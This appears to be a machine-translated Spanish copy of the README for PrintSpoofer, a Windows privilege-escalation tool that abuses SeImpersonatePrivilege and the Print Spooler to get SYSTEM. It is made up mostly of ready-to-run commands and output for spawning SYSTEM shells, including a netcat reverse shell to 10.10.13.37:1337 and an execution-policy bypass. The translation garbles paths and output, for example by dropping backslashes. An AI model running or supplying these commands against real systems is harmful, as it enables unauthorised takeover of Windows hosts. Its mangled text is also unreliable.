Del SERVICIO LOCAL/de RED al SISTEMA abusando de SeImpersonatePrivilege
en Windows 10 y Server 2016/2019.
Puede consultar el mensaje de ayuda usando la opción -h
.
C:HERRAMIENTAS>PrintSpoofer.exe -h PrintSpoofer v0.1 (por @itm4n) Siempre que el usuario actual tenga el privilegio SeImpersonate, esta herramienta aprovechará la opción Imprimir Servicio de cola de impresión para obtener un token del SISTEMA y luego ejecutar un comando personalizado con CreateProcessAsUser() Argumentos: -cEjecuta el comando *CMD* -i Interactuar con el nuevo proceso en el símbolo del sistema actual (el valor predeterminado es no interactivo) -d Genera un nuevo proceso en el escritorio correspondiente a esta sesión *ID* (verifique su ID con qwinsta) -h Ese soy yo :) Ejemplos: - Ejecute PowerShell como SISTEMA en la consola actual PrintSpoofer.exe -i -c powershell.exe - Generar un símbolo del sistema del SISTEMA en el escritorio de la sesión 1 PrintSpoofer.exe -d 1 -c cmd.exe - Obtener un shell inverso del SISTEMA PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
Si tiene un shell interactivo , puede crear un nuevo proceso de SISTEMA en su consola actual.
Caso de uso : shell de enlace, shell inverso, psexec.py
, etc.
C:HERRAMIENTAS>PrintSpoofer.exe -i -c cmd [+] Privilegio encontrado: SeImpersonatePrivilege [+] Escucha de tubería con nombre... [+] CreateProcessAsUser() Aceptar Microsoft Windows [Versión 10.0.19613.1000] (c) 2020 Corporación Microsoft. Reservados todos los derechos. C:WINDOWSsystem32>whoami nt sistema de autoridad
Si puede ejecutar comandos pero no tiene un shell interactivo, puede crear un nuevo proceso de SISTEMA y salir inmediatamente sin interactuar con él.
Caso de uso : WinRM, WebShell, wmiexec.py
, smbexec.py
, etc.
Crea un shell inverso:
C:HERRAMIENTAS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] Privilegio encontrado: SeImpersonatePrivilege [+] Escucha de tubería con nombre... [+] CreateProcessAsUser() Aceptar
Oyente de Netcat:
C:HERRAMIENTAS>nc.exe -l -p 1337 Microsoft Windows [Versión 10.0.19613.1000] (c) 2020 Corporación Microsoft. Reservados todos los derechos. C:WINDOWSsystem32>whoami nt sistema de autoridad
Si ha iniciado sesión localmente o mediante RDP (incluido VDI), puede generar un símbolo del sistema del SISTEMA en su escritorio. Primero, verifique su ID de sesión con el comando qwinsta
y luego especifique este valor con la opción -d
.
Caso de uso : Sesión de terminal (RDP), VDI
C:HERRAMIENTAS>qwinsta NOMBRE DE SESIÓN NOMBRE DE USUARIO ID ESTADO TIPO DISPOSITIVO servicios 0 Disco consola Administrador 1 Activo >rdp-tcp#3 usuario de laboratorio 3 Activo rdp-tcp 65536 Escuchar C:HERRAMIENTAS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass" [+] Privilegio encontrado: SeImpersonatePrivilege [+] Escucha de tubería con nombre... [+] CreateProcessAsUser() Aceptar